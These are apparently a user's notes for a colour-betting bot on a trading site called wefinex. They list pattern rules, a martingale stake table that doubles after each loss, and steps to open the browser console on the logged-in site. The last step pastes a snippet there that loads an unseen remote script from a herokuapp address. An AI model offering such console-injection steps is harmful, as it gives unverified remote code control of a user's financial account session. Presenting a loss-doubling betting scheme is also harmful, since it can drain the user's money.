FLow rule

var listRule = [
    "xdxdxx->x",
    "xdddxx->x",
    "xdxddx->x",
    "xddddx->x",
    "ddxdxx->x",
    "ddddxx->x",
    "ddxddx->x",
    "dddddx->x",
    "xxdxdd->d",
    "xxxxdd->d",
    "xxdxxd->d",
    "xxxxxd->d",
    "dxdxdd->d",
    "dxxxdd->d",
    "dxdxxd->d",
    "dxxxxd->d"
];
var lostValueSet = {
    0: 1,
    1: 2,
    2: 4,
    3: 8,
    4: 16,
    5: 32,
    6: 64
};



Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console


3s cuoi danh
//check lost more > 3

Remember last choose and "gap thep" if lost money


2 cau sai

16/03
Stop trade same color when go to max lostValueSet

var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/version/v9/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
